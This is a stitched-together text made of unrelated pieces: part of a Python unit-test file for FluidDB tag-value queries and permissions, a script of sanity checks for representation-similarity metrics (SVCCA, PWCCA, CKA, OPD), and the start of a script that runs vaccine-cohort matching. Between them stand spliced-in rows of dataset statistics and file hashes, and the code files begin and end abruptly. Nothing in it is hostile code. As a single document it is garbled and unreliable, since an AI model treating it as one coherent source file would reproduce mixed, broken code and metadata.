result = valuesAPI.get([objectID1, objectID2], [u'username/bar'])
self.assertEqual(1, len(result))
self.assertEqual(1, len(result[objectID2]))
self.assertEqual(123, result[objectID2][u'username/bar'].value)
@inlineCallbacks
def testDeleteValuesForQueryOnlyConsidersSpecifiedTags(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} deletes L{TagValue}s for
the objects the L{Query} matches and that match the specified L{Tag}
paths.
"""
objectID = uuid4()
values = SecureTagValueAPI(self.user)
values.set({objectID: {u'username/bar': 42, u'username/foo': 123}})
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.deleteValuesForQuery(
session, u'has username/bar', [u'username/bar'])
result = values.get([objectID], [u'username/bar', u'username/foo'])
self.assertEqual(1, len(result))
self.assertEqual(1, len(result[objectID]))
self.assertEqual(123, result[objectID][u'username/foo'].value)
@inlineCallbacks
def testDeleteValuesForQueryWithEmptyQueryResults(self):
"""
L{FacadeTagValueMixin.deleteValuesForQuery} does not fail if a
L{Query} results in an empty C{set}.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
valuesAPI = SecureTagValueAPI(self.user)
valuesAPI.set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.deleteValuesForQuery(
session, u'username/bar = 2600', [u'username/bar'])
result = valuesAPI.get([objectID], [u'username/bar'])
tagValue = result[objectID][u'username/bar'].value
self.assertEqual(42, tagValue)
def testGetValuesForQueryWithUnknownTagInQuery(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} raises a L{TNonexistentTag}
exception if any of the requested L{Tag.path}s in the L{Query} don't
exist.
"""
SecureTagValueAPI(self.user).set({uuid4(): {u'username/tag': 12}})
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getValuesForQuery(
session, u'username/unknown = 42 or username/tag = 12',
[u'username/tag'])
return self.assertFailure(deferred, TNonexistentTag)
@inlineCallbacks
def testGetValuesForQueryWithUnknownTagInReturnTags(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} ignores L{Tag.path}s that
have been requested, if they don't exist. If none of the requested
L{Tag.path}s exist an empty result is returned.
"""
SecureTagValueAPI(self.user).set({uuid4(): {u'username/tag': 12}})
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
result = yield self.facade.getValuesForQuery(
session, u'username/tag = 12', [u'username/unknown'])
self.assertEquals({u'results': {u'id': {}}}, loads(result))
@inlineCallbacks
def testGetValuesForQueryWithPartialUnknownTagInReturnTags(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} ignores L{Tag.path}s that
have been requested, if they don't exist. L{Tag.path}s that exist and
have values matched by the query are returned.
"""
objectID = uuid4()
SecureTagValueAPI(self.user).set({objectID: {u'username/tag': 12}})
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
result = yield self.facade.getValuesForQuery(
session, u'username/tag = 12',
[u'username/unknown', u'username/tag'])
result = loads(result)
updatedAt = (result[u'results'][u'id'][str(objectID)]
[u'username/tag']['updated-at'])
value = {str(objectID): {
u'username/tag': {'value': 12,
'updated-at': updatedAt,
'username': u'username'}}}
expected = {u'results': {u'id': value}}
self.assertEquals(expected, result)
@inlineCallbacks
def testGetValuesForQueryWithOnlyFluidDBIDTag(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} returns matching object IDs
when the C{fluiddb/id} tag is requested.
"""
SecureTagAPI(self.user).create([(u'username/tag', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/tag': 12}}
SecureTagValueAPI(self.user).set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.getValuesForQuery(
session, u'has username/tag', [u'fluiddb/id'])
results = loads(results)
updatedAt = (results[u'results'][u'id'][str(objectID)]
[u'fluiddb/id']['updated-at'])
value = {str(objectID): {u'fluiddb/id': {'value': str(objectID),
'updated-at': updatedAt,
'username': u'fluiddb'}}}
expected = {u'results': {u'id': value}}
self.assertEquals(expected, results)
@inlineCallbacks
def testGetValuesForQueryWithFluidDBIDTag(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} returns matching object IDs
when the C{fluiddb/id} tag is requested, in addition to other
L{Tag.path}s.
"""
SecureTagAPI(self.user).create([(u'username/tag', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/tag': 12}}
SecureTagValueAPI(self.user).set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.getValuesForQuery(
session, u'has username/tag', [u'fluiddb/id', u'username/tag'])
results = loads(results)
updatedAt1 = (results[u'results'][u'id'][str(objectID)]
[u'fluiddb/id']['updated-at'])
updatedAt2 = (results[u'results'][u'id'][str(objectID)]
[u'username/tag']['updated-at'])
value = {str(objectID): {
u'fluiddb/id': {
'value': str(objectID),
'updated-at': updatedAt1,
'username': u'fluiddb'},
u'username/tag': {
'value': 12,
'updated-at': updatedAt2,
'username': u'username'}}}
expected = {u'results': {u'id': value}}
self.assertEquals(expected, results)
@inlineCallbacks
def testGetValuesForQueryWithReadQueryPermissionDenied(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} raises a
L{TNonexistentTag} exception if the user doesn't have
C{Operation.READ_TAG_VALUE} permission on any of the L{Tag}s in the
L{Query}.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'username')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description')])
values = [(u'fred/bar', Operation.READ_TAG_VALUE,
Policy.CLOSED, [u'fred'])]
permissions.set(values)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getValuesForQuery(
session, u'fred/bar = 42', [u'fred/bar'])
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'fred/bar', error.path)
@inlineCallbacks
def testGetValuesForQueryWithReadReturnPermissionDenied(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} raises a
L{TNonexistentTag} exception if the user doesn't have
C{Operation.READ_TAG_VALUE} permission on any of the outgoing
L{Tag}s.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'fred')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description'),
(u'fred/foo', u'description')])
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {uuid4(): {u'fred/bar': 42}}
SecureTagValueAPI(user).set(values)
runDataImportHandler(self.client.url)
values = [(u'fred/foo', Operation.READ_TAG_VALUE,
Policy.CLOSED, [u'fred'])]
permissions.set(values)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getValuesForQuery(
session, u'fred/bar = 42', [u'fred/foo'])
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'fred/foo', error.path)
@inlineCallbacks
def testGetValuesForQueryWithInvalidQuery(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} raises a
L{TParseError} exception if the incoming L{Query} can't be parsed.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getValuesForQuery(
session, u'username/bar 42', [u'username/bar'])
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testGetValuesForQueryWithIllegalQuery(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} raises a L{TBadRequest}
exception if the incoming L{Query} contains an illegal expression.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getValuesForQuery(
session, u'has fluiddb/about', [u'username/bar'])
yield self.assertFailure(deferred, TBadRequest)
@inlineCallbacks
def testGetValuesForQueryWithSearchError(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} raises L{TParseError} if the
query is not well formed.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getValuesForQuery(session, 'has fluiddb/id',
[u'username/bar'])
yield self.assertFailure(deferred, TParseError)
@inlineCallbacks
def testGetValuesForQueryWithEmptyQueryResults(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} does not fail if a
L{Query} results in an empty C{set}.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
createTagValue(self.user.id, tag.id, objectID, 42)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.getValuesForQuery(
session, u'username/bar = 2600', [u'username/bar'])
expected = {u'results': {u'id': {}}}
self.assertEquals(expected, loads(results))
@inlineCallbacks
def testGetValuesForQuery(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} returns the L{TagValue}
of an object if the L{Query} matches and the L{User} has permissions.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
SecureTagValueAPI(self.user).set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.getValuesForQuery(
session, u'username/bar = 42', [u'username/bar'])
results = loads(results)
updatedAt = (results[u'results'][u'id'][str(objectID)]
[u'username/bar']['updated-at'])
expected = {
u'results': {
u'id': {
str(objectID): {
u'username/bar': {
u'value': 42,
u'updated-at': updatedAt,
u'username': 'username'}}}}}
self.assertEqual(expected, results)
@inlineCallbacks
def testGetValuesForQueryWithoutReturnTags(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} returns all available
L{TagValue}s for the objects the L{Query} matches and that the L{User}
has L{Operation.READ_TAG_VALUE} permission for.
"""
SecureTagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
# FIXME replace this with SecureTagValueAPI once the index is
# integrated
values = {objectID: {u'username/bar': 42}}
SecureTagValueAPI(self.user).set(values)
runDataImportHandler(self.client.url)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
results = yield self.facade.getValuesForQuery(session,
u'username/bar = 42')
results = loads(results)
updatedAt = (results[u'results'][u'id'][str(objectID)]
[u'username/bar']['updated-at'])
expected = {
u'results': {
u'id': {
str(objectID): {
u'username/bar': {
u'value': 42,
u'updated-at': updatedAt,
u'username': 'username'}}}}}
self.assertEqual(expected, results)
@inlineCallbacks
def testGetValuesForQueryWithBinaryValue(self):
"""
L{FacadeTagValueMixin.getValuesForQuery} returns only the MIME type
and the size of binary L{TagValue}s, but not their contents.
"""
SecureTagAPI(self.user).create([(u'username/tag1', u'description'),
(u'username/tag2', u'description')])
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
objectID = uuid4()
thriftValue = createBinaryThriftValue('Hello, world!',
'text/plain')
yield self.facade.setTagInstance(session, u'username/tag1',
str(objectID), thriftValue)
thriftValue = createThriftValue(42)
yield self.facade.setTagInstance(session, u'username/tag2',
str(objectID), thriftValue)
runDataImportHandler(self.client.url)
results = yield self.facade.getValuesForQuery(
session, u'username/tag2 = 42', [u'username/tag1'])
results = loads(results)
updatedAt = (results[u'results'][u'id'][str(objectID)]
[u'username/tag1']['updated-at'])
expected = {
u'results': {
u'id': {
str(objectID): {
u'username/tag1': {
u'value-type': u'text/plain',
u'size': 13,
u'updated-at': updatedAt,
u'username': u'username'}}}}}
self.assertEquals(expected, results)
| 46.03868
| 79
| 0.594976
| 7,743
| 80,936
| 6.213096
| 0.052305
| 0.070529
| 0.037665
| 0.031055
| 0.811695
| 0.786626
| 0.763865
| 0.726449
| 0.694729
| 0.685312
| 0
| 0.010556
| 0.290686
| 80,936
| 1,757
| 80
| 46.064883
| 0.827431
| 0.142854
| 0
| 0.728287
| 0
| 0
| 0.112357
| 0.000989
| 0
| 0
| 0
| 0.01366
| 0.102789
| 1
| 0.066932
| false
| 0.008765
| 0.046215
| 0
| 0.117131
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2963e605f7456bc485b2ec8970c708bb5511e7bc
| 14,588
|
py
|
Python
|
sanity_checks/sanity_check_inspired_for_div.py
|
brando90/ultimate-anatome
|
9240d0530ad6d0533f9695d4e3cfab3991715c4e
|
[
"MIT"
] | 3
|
2022-01-04T15:53:23.000Z
|
2022-02-01T18:51:43.000Z
|
sanity_checks/sanity_check_inspired_for_div.py
|
brando90/ultimate-anatome
|
9240d0530ad6d0533f9695d4e3cfab3991715c4e
|
[
"MIT"
] | 3
|
2021-11-03T15:59:28.000Z
|
2021-12-01T04:29:59.000Z
|
sanity_checks/sanity_check_inspired_for_div.py
|
brando90/ultimate-anatome
|
9240d0530ad6d0533f9695d4e3cfab3991715c4e
|
[
"MIT"
] | 1
|
2022-03-11T15:43:36.000Z
|
2022-03-11T15:43:36.000Z
|
# import torch
# import numpy as np
# import random
#
# np.random.seed(0)
# torch.manual_seed(0)
# random.seed(0)
#%%
from copy import deepcopy
import torch
import torch.nn as nn
# import uutils.torch_uu
from uutils.torch_uu import get_metric, approx_equal
from uutils.torch_uu.models import get_named_identity_one_layer_linear_model
print('--- Sanity check: dCCA == 0.0 when using same reference to the same net with the same input. --')
Din: int = 10
Dout: int = Din
B: int = 2000
mdl1: nn.Module = get_named_identity_one_layer_linear_model(D=Din)
mdl2: nn.Module = mdl1
layer_name = 'fc0'
# - ends up comparing two matrices of size [B, Dout], on same data, on same model
metric_as_sim_or_dist: str = 'dist'
metric_comparison_type = 'svcca'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'pwcca'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'lincka'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'opd'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.? {approx_equal(dist, 0.0, tolerance=1e-2)}')
assert(approx_equal(dist, 0.0, tolerance=1e-2)), f'dist should be close to 0.0 but got {dist=}'
#%%
from copy import deepcopy
import torch
import torch.nn as nn
# import uutils.torch_uu
from uutils.torch_uu import get_metric, approx_equal
from uutils.torch_uu.models import get_named_identity_one_layer_linear_model
print('--- Sanity check: dCCA == 0.0 when using the same net twice but different references same input (deepcopy) --')
Din: int = 10
Dout: int = Din
B: int = 2000
mdl1: nn.Module = get_named_identity_one_layer_linear_model(D=Din)
mdl2: nn.Module = deepcopy(mdl1)
layer_name = 'fc0'
# - ends up comparing two matrices of size [B, Dout], on same data, on same model
metric_as_sim_or_dist: str = 'dist'
metric_comparison_type = 'svcca'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'pwcca'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'lincka'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'opd'
X: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X, X, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.? {approx_equal(dist, 0.0, tolerance=1e-2)}')
assert(approx_equal(dist, 0.0, tolerance=1e-2)), f'dist should be close to 0.0 but got {dist=}'
#%%
from copy import deepcopy
import torch
import torch.nn as nn
# import uutils.torch_uu
from uutils.torch_uu import get_metric, approx_equal
from uutils.torch_uu.models import get_named_identity_one_layer_linear_model
print("--- Sanity check: dCCA == 0.0 when using same reference to the same network even though its different input ('BUG' CASE). --")
Din: int = 10
Dout: int = Din
B: int = 2000
mdl1: nn.Module = get_named_identity_one_layer_linear_model(D=Din)
mdl2: nn.Module = mdl1
layer_name = 'fc0'
# - ends up comparing two matrices of size [B, Dout], on same data, on same model
metric_as_sim_or_dist: str = 'dist'
metric_comparison_type = 'svcca'
X1: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
X2: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'pwcca'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'lincka'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.0? {approx_equal(dist, 0.0)}')
assert(approx_equal(dist, 0.0)), f'dist should be close to 0.0 but got {dist=}'
metric_comparison_type = 'opd'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'Should be very very close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it close to 0.? {approx_equal(dist, 0.0, tolerance=1e-2)}')
assert(approx_equal(dist, 0.0, tolerance=1e-2)), f'dist should be close to 0.0 but got {dist=}'
#%%
from copy import deepcopy
import torch
import torch.nn as nn
# import uutils.torch_uu as torch_uu
from uutils.torch_uu import norm
from uutils.torch_uu import get_metric, approx_equal
from uutils.torch_uu.models import get_named_identity_one_layer_linear_model
print("--- Sanity check: dCCA > 0.0 when using different reference to the same network and using different inputs. --")
Din: int = 10
Dout: int = Din
B: int = 2000
mdl1: nn.Module = get_named_identity_one_layer_linear_model(D=Din)
mdl2: nn.Module = deepcopy(mdl1)
layer_name = 'fc0'
# - ends up comparing two matrices of size [B, Dout], on same data, on same model
metric_as_sim_or_dist: str = 'dist'
X1: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
X2: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
metric_comparison_type = 'svcca'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are same so they should have the same norm for weights bug got: {norm(mdl1),norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far to 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
metric_comparison_type = 'pwcca'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are same so they should have the same norm for weights bug got: {norm(mdl1),norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far to 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
metric_comparison_type = 'lincka'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are same so they should have the same norm for weights bug got: {norm(mdl1),norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far to 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
metric_comparison_type = 'opd'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are same so they should have the same norm for weights bug got: {norm(mdl1),norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far to 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
#%%
from copy import deepcopy
import torch
import torch.nn as nn
# import uutils.torch_uu as torch_uu
from uutils.torch_uu import norm
from uutils.torch_uu import get_metric, approx_equal
from uutils.torch_uu.models import get_named_identity_one_layer_linear_model
print("--- Sanity check: dCCA > 0.0 when using different reference to the same network and using different inputs. --")
Din: int = 10
Dout: int = Din
B: int = 2000
mdl1: nn.Module = get_named_identity_one_layer_linear_model(D=Din)
mdl2: nn.Module = deepcopy(mdl1)
# mdl2: nn.Module = mdl1
layer_name = 'fc0'
# - ends up comparing two matrices of size [B, Dout], on same data, on same model
metric_as_sim_or_dist: str = 'dist'
X1: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
X2: torch.Tensor = torch.distributions.Normal(loc=0.0, scale=1.0).sample((B, Din))
metric_comparison_type = 'svcca'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are same so they should have the same norm for weights bug got: {norm(mdl1),norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far to 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
metric_comparison_type = 'pwcca'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are same so they should have the same norm for weights bug got: {norm(mdl1),norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far to 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
metric_comparison_type = 'lincka'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are same so they should have the same norm for weights bug got: {norm(mdl1),norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far to 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
metric_comparison_type = 'opd'
assert (X1.norm() != X2.norm())
assert norm(mdl1) == norm(mdl2), f'Models are same so they should have the same norm for weights bug got: {norm(mdl1),norm(mdl2)}'
dist: float = get_metric(mdl1, mdl2, X1, X2, layer_name, downsample_size=None, iters=1, metric_comparison_type=metric_comparison_type, metric_as_sim_or_dist=metric_as_sim_or_dist)
print(f'{metric_as_sim_or_dist=}')
print(f'Should not be close to 0.0: {dist=} ({metric_comparison_type=})')
print(f'Is it far to 0.0? {not approx_equal(dist, 0.0)} it is: {dist=}')
assert(not approx_equal(dist, 0.0)), f' {dist=}'
| 53.047273
| 179
| 0.750823
| 2,625
| 14,588
| 3.956571
| 0.044571
| 0.020797
| 0.154054
| 0.066339
| 0.982188
| 0.981514
| 0.981514
| 0.981514
| 0.981514
| 0.981514
| 0
| 0.034834
| 0.110502
| 14,588
| 275
| 180
| 53.047273
| 0.765567
| 0.045997
| 0
| 0.985366
| 0
| 0.117073
| 0.332158
| 0.065928
| 0
| 0
| 0
| 0
| 0.17561
| 1
| 0
| false
| 0
| 0.131707
| 0
| 0.131707
| 0.258537
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
296553839382c7576901a851119a42cab535c180
| 5,941
|
py
|
Python
|
scripts/corona_matching_runs.py
|
higorsmonteiro/vaccine-eff-fortaleza
|
ee4465a4b767dab15773b973a19ff900f9f96a66
|
[
"MIT"
] | null | null | null |
scripts/corona_matching_runs.py
|
higorsmonteiro/vaccine-eff-fortaleza
|
ee4465a4b767dab15773b973a19ff900f9f96a66
|
[
"MIT"
] | null | null | null |
scripts/corona_matching_runs.py
|
higorsmonteiro/vaccine-eff-fortaleza
|
ee4465a4b767dab15773b973a19ff900f9f96a66
|
[
"MIT"
] | null | null | null |
import os
os.chdir("..")
# JAN-AUG COHORT
for seed in [6,7,8,9,10]:
print(f"JAN-AUG COHORT -> Seed {seed} CORONAVAC")
# ALLPOP CORONAVAC
os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 1 --pop_test ALL --dose DATA D1 --days_after 0 --suffix NOVO")
os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 1 --pop_test ALL --dose DATA D2 --days_after 0 --suffix NOVO")
os.system(f"python perform_matching.py --start 2021-01-21 --end 2021-08-31 --vaccine CORONAVAC --age_range 60 200 --seed {seed} --hdi_index 1 --pop_test ALL --dose DATA D1 --days_after 7 --suffix NOVO")
